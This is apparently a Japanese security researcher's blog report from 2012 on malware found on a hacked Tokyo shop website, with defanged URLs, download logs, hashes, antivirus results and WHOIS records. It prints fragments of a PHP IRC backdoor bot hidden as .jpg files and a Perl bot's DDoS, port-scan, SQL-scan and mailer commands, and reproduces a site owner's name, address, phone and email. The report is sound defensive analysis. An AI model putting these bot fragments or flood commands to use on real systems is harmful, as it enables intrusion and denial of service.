木曜日, 2月 02, 2012

【マルウェア報告】#OCJP-005: asakusa-kagetudo.com(210.172.144.27)のサーバがPHP-IRCバックドア・ウェアとDDoS攻撃ツールが発見されました。【対応済み】


■下記のサイト↓
asakusa-kagetudo.com/210.172.144.27
■下記のダウンロードURL/ファイル↓
hxxp://asakusa-kagetudo.com/modules/shop/11.jpg hxxp://asakusa-kagetudo.com/modules/shop/10.jpg hxxp://www.asakusa-kagetudo.com/modules/shop/11.jpg hxxp://www.asakusa-kagetudo.com/modules/shop/10.jpg
■メモ↓ 昨年、平成23年10月17日に本件のサイトもPHPマルウェアのボットに感染されました、 その時にDDoS攻撃ツールとEXPLOITルールPHP経由マルウェアが発見されました、 下記は前回のレポート内容↓ ↓↓ http://unixfreaxjp.blogspot.com/2011/10/backdoor-php-shellbot.html http://unixfreaxjp.blogspot.com/2011/10/php-pbot.html ↑恐らく昨年と同じ状況で「asakusa-kagetudo.com」のウェブサイトがハッキングされたと思われます。 前回と今回のマルウェアコードを確認したら、同じ種類マルウェアと同じ南アジアの言語を発見しましたので、 ウェブサイトにある脆弱性を直したほうがいいと思います。
証拠↓
Date: Thu Feb 2 14:01:06 JST 2012 感染されたベースURLの画像↓
↑恐らくウェブサーバの脆弱でハッキングされたと思います。
HTMLコードコードで詳しく見たら只のテキスト↓
$curl http://asakusa-kagetudo.com/modules/shop/ !!!!!!!!!!!!!!!!!!!!!!!!
wgetでダウンロードしたら↓
--14:02:57-- hxxp://www.asakusa-kagetudo.com/modules/shop/10.jpg => `10.jpg' Resolving www.asakusa-kagetudo.com... 210.172.144.27 Connecting to www.asakusa-kagetudo.com|210.172.144.27|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 42,942 (42K) [image/jpeg] 100%[====================================>] 42,942 --.--K/s 14:02:57 (722.56 KB/s) - `10.jpg' saved [42942/42942] --14:03:05-- hxxp://www.asakusa-kagetudo.com/modules/shop/11.jpg => `11.jpg' Resolving www.asakusa-kagetudo.com... 210.172.144.27 Connecting to www.asakusa-kagetudo.com|210.172.144.27|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 42,923 (42K) [image/jpeg] 100%[====================================>] 42,923 --.--K/s 14:03:05 (4.45 MB/s) - `11.jpg' saved [42923/42923] --14:04:39-- hxxp://asakusa-kagetudo.com/modules/shop/11.jpg => `11.jpg.1' Resolving asakusa-kagetudo.com... 210.172.144.27 Connecting to asakusa-kagetudo.com|210.172.144.27|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 42,923 (42K) [image/jpeg] 100%[====================================>] 42,923 --.--K/s 14:04:39 (681.98 KB/s) - `11.jpg.1' saved [42923/42923] --14:04:44-- hxxp://asakusa-kagetudo.com/modules/shop/10.jpg => `10.jpg.1' Resolving asakusa-kagetudo.com... 210.172.144.27 Connecting to asakusa-kagetudo.com|210.172.144.27|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 42,942 (42K) [image/jpeg] 100%[====================================>] 42,942 --.--K/s 14:04:44 (680.35 KB/s) - `10.jpg.1' saved [42942/42942]
■下記のマルウェアを発見しました↓
マルウェア種類:PHP経由のIRCボット マルウェア名 :Backdoor.PHP.IRCBot マルウェア機能:Infectious Command、Backdoor 説明     :1. 他のPHPウェブサーバの感染機能を発見(Infectious)、 2. IRCポートでIRCサーバへ接続されて、         3. IRCサーバからのコマンドを実行機能を発見(Backdoor)
■オンラインスキャン結果↓
SHA256: dfe98f56fb403b1b12321882fe864c778fe559534bf3c120c2d999301491eb7e MD5: fcccdb4fb0eea30c029724c1eb60bafe File size: 41.9 KB ( 42942 bytes ) File name: 10.jpg Detection ratio: 18 / 43 Analysis date: 2012-02-02 05:25:06 UTC SHA256: 130f34e2cbb1e8231040f159ee77aa1db46e8404228c95281390a56ab9440d4e MD5: e192a8b06f3606eb5b4438d96b4289f2 File size: 41.9 KB ( 42923 bytes ) File name: 11.jpg Detection ratio: 18 / 43 Analysis date: 2012-02-02 05:25:25 UTC ■現在のスキャン結果(18 / 43)↓ ----------------------------------------- Antivirus Result Update ----------------------------------------- eSafe - 20120126 eTrust-Vet PHP/Pbot.H 20120127 F-Prot PHP/Ircbot.E 20120126 F-Secure Backdoor.IRCBot.ADBK 20120127 Fortinet - 20120127 GData Backdoor.IRCBot.ADBK 20120127 Ikarus Backdoor.PHP.IRCBot 20120127 Jiangmin Backdoor/PhpAgent.ad 20120125 K7AntiVirus Backdoor 20120126 Kaspersky Backdoor.PHP.IRCBot.gg 20120127 McAfee - 20120126 McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G 20120127 Microsoft - 20120127 NOD32 - 20120127 Norman PHP/Ircbot.BBTA 20120126 nProtect Backdoor.IRCBot.ADBK 20120126 Panda Bck/IRCBot.CYG 20120126 PCTools - 20120127 Prevx - 20120202 Rising - 20120118 Sophos - 20120127 SUPERAntiSpyware - 20120127 Symantec - 20120127 TheHacker - 20120126 TrendMicro - 20120127 TrendMicro-HouseCall - 20120127 VBA32 - 20120126 VIPRE - 20120127 ViRobot - 20120127 VirusBuster - 20120126 -----------------------------------------

■マルウェアの調査↓
ファイルの情報とアイコンが下記の様にです↓
・scriptファイルがJPGに保存されただけです。 ・マークされた日付けが恐らく最初保存された日付け。 -rwx------ 1 42942 Aug 26 05:13 10.jpg* fcccdb4fb0eea30c029724c1eb60bafe -rwx------ 1 42923 Nov 25 00:30 11.jpg* e192a8b06f3606eb5b4438d96b4289f2 UNIXでlistしたら、↑本マルウェアファイルは実行権限が持っています。
PHPコードの証拠↓
?<?php /* +---------------------------------------------+ |#############################################| |#[ bot PHP version IRC v5.5 ]#| |#[ By Jancok ]#| |#[ 2010 lebay Community ]#| |#[ irc: #lebay @ jancok.org ]#| |#############################################| +---------------------------------------------+ */ function rx() { /* Channel JupIt3r */ $channels = '#ornamen'; // chanell pisahkan dengan spasi /*** Admin ***/ $admin = 'r4puh'; $JupIt3r_password = 'nik'; //Password untuk auth JupIt3r $localtest = 0; //1, Coba di localhost. 0, connect ke server irc $showrespone = 0; //1, Nampilin respon dari server irc  :  :
IRCサーバへ接続コードのスナップショット↓
echo "\n"; echo " Connecting to $remotehost...\n"; do { $fp = fsockopen($remotehost,$port, $err_num, $err_msg, 60); if(!$fp) { if ( $counterfp <= 200 ) { $counterfp = $counterfp + 1; rx(); : :
IRCチャンネルのコマンド↓
elseif ($com[3]==':`op' && $chan) { if ($com[4]) { $opnick = $com[4]; } else { $opnick = $dNick; } fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL); } elseif ($com[3]==':`deop' && $chan) { if ($com[4]) { $opnick = $com[4]; } else { $opnick = $dNick; } fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL); } elseif ($com[3]==':`v' && $chan) { if ($com[4]) { $vonick = $com[4]; } else { $vonick = $dNick; } fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); } elseif ($com[3]==':`dv' && $chan) { if ($com[4]) { $vonick = $com[4]; } else { $vonick = $dNick; } fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); } : :
10.jpgと11.jpgの違いなのは、IRCユーザのニックネーム↓
118,119c118,119 < $realname = "loma"; < $identify = 'ugail'; --- > $realname = "doil"; > $identify = 'das'; : :
■本マルウェアに感染されたサイトの情報
ドメイン情報↓ Domain Name: ASAKUSA-KAGETUDO.COM Registrar: GMO INTERNET, INC. DBA ONAMAE.COM Whois Server: whois.discount-domain.com Referral URL: http://www.onamae.com Name Server: UNS01.LOLIPOP.JP Name Server: UNS02.LOLIPOP.JP Status: ok Updated Date: 26-aug-2011 Creation Date: 24-sep-2006 Exp Date: 24-sep-2016 Reg Name: Yoshifumi Yuki Reg Org.: Yoshifumi Yuki Reg Street1: 2-2-10 Asakusa Reg City: Taitou-ku Reg State: Tokyo Reg Postal Code:111-0032 Reg Country: JP Reg Phone: 03-3847-5251 Reg Email: yoshifumi-yuki@jcom.home.ne.jp IP/ネットワーク情報↓ IP ADDRESS: 210.172.144.27 AS NUMBER: 7506 NETWORK PREFIX: 210.172.128.0/19 AS NAME: INTERQ COUNTRY: JP ISP DOMAIN: GMO.JP ISP NAME: GMO INTERNET INC a. [Network Number] 210.172.128.0/18 b. [Network Name] INTERQ g. [Organization] Global Media Online inc. m. [Administrative Contact] TW184JP n. [Technical Contact] TW184JP p. [Nameserver] dns.interq.or.jp p. [Nameserver] dns1.interq.or.jp [Assigned Date] 1997/11/06 [Return Date] [Last Update] 2008/08/07 19:11:05(JST) a. [JPNICハンドル] TW184JP b. [氏名] 割田 太郎 c. [Last, First] Warita, Taro d. [電子メイル] warita@gmo.jp f. [組織名] GMOインターネット株式会社 g. [Organization] GMO Internet,Inc k. [部署] システム本部ネットワークチーム l. [Division] System Department,Network Team m. [肩書] リーダ n. [Title] Leader o. [電話番号] 03-5456-2555 p. [FAX番号] 03-5456-2687 y. [通知アドレス] network-team@gmo.jp [最終更新] 2007/05/28 11:32:32(JST) db-staff@nic.ad.jp インターネットルーティング情報↓ IPのGEOロケーションの情報↓
■調査の結論↓
・今回マルウェア事件に付いて、リモートからウェブサーバがハッキングされて  マルウェアがアップロードされたそうです。 ・昨年も同じウェブサイトで同じマルウェア種類を発見されましたので、  ハッカーが本ウェブサイトを狙ったと思われます。 ・本サイトの脆弱性が直さない限りまた同じ事件が起きてしまう可能性があります。 ・恐らくhttpのログを確認したらハッカーのIPアドレスの確認が出来ると思います。 ・マルウェアを削除して下さい、お願い致します。 ・現在、マルウェアのダウンロードURLが未だアップされています↓ Thu Feb 2 16:46:16 JST 2012 --16:46:26-- hxxp://asakusa-kagetudo.com/modules/shop/11.jpg => `11.jpg.2' Resolving asakusa-kagetudo.com... 210.172.144.27 Connecting to asakusa-kagetudo.com|210.172.144.27|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 42,923 (42K) [image/jpeg] 100%[====================================>] 42,923 --.--K/s 16:46:27 (290.43 KB/s) - `11.jpg.2' saved [42923/42923]
■本感染されたドメインに追加マルウェアを発見されました。
発見確認日付け: Fri Feb 3 12:40:16 JST 2012 本件のURLに追加マルウェアのURLを発見されました↓
hxxp://www.asakusa-kagetudo.com/modules/shop/es.txt hxxp://asakusa-kagetudo.com/modules/shop/es.txt
マルウェア種類はネットワークDDoS攻撃ツールです、
ポートスキャン機能、SQLインジェックション攻撃機能、メール送る機能も発見、 下記コードのスナップショット↓
 : #-----[DDos Based]----- ←DDoSのツール # !bot @udpflood <host> <packet size> <time> # !bot @tcpflood <host> <port> <packet size> <time> # !bot @httpflood <host> <time> # !bot @sqlflood <host> <time>  :  : ###################### # Portscan # ←ポートスキャンツール ###################### if ($funcarg =~ /^portscan (.*)/) { my $hostip="$1";  :  : ####### SQL SCANNER ######### ←SQL攻撃機能 if ($funcarg =~ /^autoscan\s+(.*)\s+http\:\/\/(.*?)\/(.*?)\s+(\d+)/){ if (my $pid = fork) { waitpid($pid, 0); } else { if (my $d=fork()) { addproc($d,"[String] $2"); exit;  :  : ###################### # MAILER # ←メールを送る機能 ###################### if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ 3Mailer 12] Mailer :. | Sending Mail to : 2 $3"); $subject = $1; $sender = $2; $recipient = $3; @corpo = $4;
↑上記のPHPを動かすGUIも発見しました↓ ■スキャンしたら下記の結果となります↓ ------------------------------------------------- MD5: ad5cefd64ef0db9186f4d9a72ffb079f File size: 64.7 KB ( 66279 bytes ) File name: es.txt File type: unknown Detection ratio: 26 / 42 Analysis date: 2012-02-03 08:34:17 UTC
------------------------------------------------- Antivirus Result Update -------------------------------------------------- AhnLab-V3 - 20120202 AntiVir Perl/Shellbot.B.3 20120203 Antiy-AVL Backdoor/Perl.IRCBot 20120202 Avast Perl:Shellbot-O [Trj] 20120202 AVG PERL/ShellBot.C 20120203 BitDefender Backdoor.Perl.Shellbot.B 20120203 ByteHero - 20120126 CAT-QuickHeal PERL/IRCbot.gen 20120203 ClamAV Trojan.Perlbot 20120203 Commtouch - 20120203 Comodo UnclassifiedMalware 20120203 DrWeb Perl.Ircbot.5 20120203 Emsisoft Backdoor.Perl.Shellbot!IK 20120203 eSafe - 20120202 eTrust-Vet Perl/IrcBot.JDY 20120202 F-Prot - 20120201 F-Secure Backdoor.Perl.Shellbot.B 20120203 Fortinet Perl/IRCBot.I!tr 20120203 GData Backdoor.Perl.Shellbot.B 20120203 Ikarus Backdoor.Perl.Shellbot 20120203 Jiangmin Backdoor/Script.qr 20120202 K7AntiVirus - 20120202 McAfee Perl/Shellbot 20120202 McAfee-GW-Edition Perl/Shellbot 20120203 Microsoft - 20120203 NOD32 Perl/Shellbot.B 20120203 Norman Shellbot.C 20120202 nProtect Backdoor.Perl.Shellbot.B 20120202 Panda - 20120202 PCTools - 20120201 Prevx - 20120203 Rising - 20120118 Sophos Mal/PerlBot-A 20120203 SUPERAntiSpyware - 20120203 Symantec - 20120203 TheHacker - 20120202 TrendMicro BKDR_PERLBOT.SMO 20120203 TrendMicro-HouseCall BKDR_PERLBOT.SMO 20120203 VBA32 - 20120202 VIPRE Backdoor.Perl.IRCBot.a (v) 20120203 ViRobot - 20120203 VirusBuster Perl.Shellbot.I 20120202
↑本マルウェアツールが非常に危ないネットワーク攻撃ツールですので、 早めに削除して欲しいです。ご協力をお願いします。
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Sponsored by: 株式会社ケイエルジェイテック

4 件のコメント:

  1. 本件は報告済みですが、現在マルウェアが未だアップされている状況です。下記証拠

    Date: Fri Feb 3 17:45:23 JST 2012

    --17:33:57-- hxxp://asakusa-kagetudo.com/modules/shop/es.txt
    => `es.txt'
    Resolving asakusa-kagetudo.com... 210.172.144.27
    Connecting to asakusa-kagetudo.com|210.172.144.27|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 66,279 (65K) [text/plain]
    100%[====================================>] 66,279 --.--K/s
    17:33:58 (782.61 KB/s) - `es.txt' saved [66279/66279]

    --17:46:00-- hxxp://www.asakusa-kagetudo.com/modules/shop/11.jpg
    => `11.jpg'
    Resolving www.asakusa-kagetudo.com... 210.172.144.27
    Connecting to www.asakusa-kagetudo.com|210.172.144.27|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 42,923 (42K) [image/jpeg]
    100%[====================================>] 42,923 --.--K/s
    17:46:00 (1.16 MB/s) - `11.jpg' saved [42923/42923]

    ↑早めに削除した方が有り難いですね…
    特にDDoSツールの物が危険だし…
    (;´・Д・`p《 心 配 》q

    返信削除
  2. I have been seeing this one around lately. At least some instances are related to an Indonesian cyber crime ring. Here is another instance (archived in my decoder): https://defense.ballastsecurity.net/decoding/index.php?raw=69f92ced630049ae4b332c98528642a1

    For the hashes of all the instances in my decoder, this search works: https://defense.ballastsecurity.net/decoding/api/payload/list/Kode%20Utama

    返信削除
    返信
    1. I've also been referring to it as "HaRaZuKu".

      削除
  3. I have been seeing this one around lately. At least some instances are related to an Indonesian cyber crime ring. Here is another instance (archived in my decoder): https://defense.ballastsecurity.net/decoding/index.php?raw=69f92ced630049ae4b332c98528642a1

    For the hashes of all the instances in my decoder, this search works: https://defense.ballastsecurity.net/decoding/api/payload/list/Kode%20Utama

    返信削除